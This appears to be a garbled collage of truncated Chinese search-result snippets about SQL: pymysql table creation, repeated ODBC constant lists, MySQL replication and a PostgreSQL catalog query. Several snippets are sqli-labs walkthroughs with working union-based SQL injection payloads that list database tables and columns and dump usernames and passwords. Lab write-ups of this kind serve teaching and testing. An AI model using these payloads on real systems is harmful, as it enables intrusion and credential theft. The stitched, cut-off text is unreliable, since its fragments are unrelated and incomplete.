cursor.execute('DROP TABLE IF EXISTS table1')#创建表之前检验是否已有该表,有则删除 #用sql语句创建表table1,并定义各参数 sqlQuery = "CREATE TABLE table1(Name CHAR(20) NOT NULL ,professional CHAR(20),number int )" cursor.execute(sqlQuery) except pymysql.Error as error: print('表创建失败'...
1 1.2223' union select 1,table_name from information_schema.tables where table_schema=database() # >>> OK,当前数据库下的表's name有已经拿到,,定睛一看,,users,,这个表有点可疑呀,,user什么意思>>用户 SO,我们来看一下users表里有什么东西,来,上恶意代码 1 1.2333' union select 1,column_nam...
SQL_DYNAMIC_CURSOR_ATTRIBUTES2 SQL_FORWARD_ONLY_CURSOR_ATTRIBUTES1 SQL_FORWARD_ONLY_CURSOR_ATTRIBUTES2 SQL_FILE_USAGE SQL_GETDATA_EXTENSIONS SQL_INFO_SCHEMA_VIEWS SQL_KEYSET_CURSOR_ATTRIBUTES1 SQL_KEYSET_CURSOR_ATTRIBUTES2 SQL_MAX_ASYNC_CONCURRENT_STATEMENTS SQL_MAX_CONCURRENT_ACTIVITIES SQL_MAX_DRIVER...
1.2 主从原理架构 MySQL主从同步至少需要用到2台服务器,一台为master库,另一台为slave库,要实现复制首先需要在master上开启bin-log日志功能,bin-log日志用于记录在Master库中执行的增、删、修改、更新操作的sql语句,整个过程需要开启3个线程,分别是Master开启IO线程,Slave开启IO线程和SQL线程。 2. 准备实验环境 这个...
uname=1' union select 1,group_concat(column_name) from information_schema.columns where table_name="users"#&passwd=1 uname=1' union select 1,group_concat(concat_ws(char(32,58,32),id,username,password)) from users#&passwd=1 其中#表示注释,后面的SQL语句都不起作用了!
SQL_INFO_SCHEMA_VIEWS SQL_KEYSET_CURSOR_ATTRIBUTES1 SQL_KEYSET_CURSOR_ATTRIBUTES2 SQL_MAX_ASYNC_CONCURRENT_STATEMENTS SQL_MAX_CONCURRENT_ACTIVITIES SQL_MAX_DRIVER_CONNECTIONS SQL_ODBC_INTERFACE_CONFORMANCE SQL_ODBC_STANDARD_CLI_CONFORMANCE SQL_ODBC_VER SQL_PARAM_ARRAY_ROW_COUNTS SQL_PARAM_ARRAY_SELECT...
SQL_INFO_SCHEMA_VIEWS SQL_KEYSET_CURSOR_ATTRIBUTES1 SQL_KEYSET_CURSOR_ATTRIBUTES2 SQL_MAX_ASYNC_CONCURRENT_STATEMENTS SQL_MAX_CONCURRENT_ACTIVITIES SQL_MAX_DRIVER_CONNECTIONS SQL_ODBC_INTERFACE_CONFORMANCE SQL_ODBC_STANDARD_CLI_CONFORMANCE SQL_ODBC_VER SQL_PARAM_ARRAY_ROW_COUNTS SQL_PARAM_ARRAY_SELECT...
-- 2615: pg_namespace(from pg_class) -- 2200: public(from pg_namespace) postgres=# SELECT pg_get_object_address('schema', '{public}', '{t1}'); pg_get_object_address --- (2615,2200,0) -- 1259: pg_class(from pg_class) -- 16398: t1(from pg_class) SELECT pg_get_object_ad...
http://localhost:8080/sqli-labs-master/Less-3/ ?id=-1') union select 1,2,group_concat(schema_name) from information_schema.schemata--+ 第六步:爆数据库表名 http://localhost:8080/sqli-labs-master/Less-3/ ?id=-1') union select 1,2,group_concat(table_na...
drop-schema-statement"DROP SCHEMA"SQL_DIAG_DROP_SCHEMA drop-table-statement"DROP TABLE"SQL_DIAG_DROP_TABLE drop-translation-statement"DROP TRANSLATION"SQL_DIAG_DROP_TRANSLATION drop-view-statement"DROP VIEW"SQL_DIAG_DROP_VIEW grantstatement"GRANT"SQL_DIAG_GRANT ...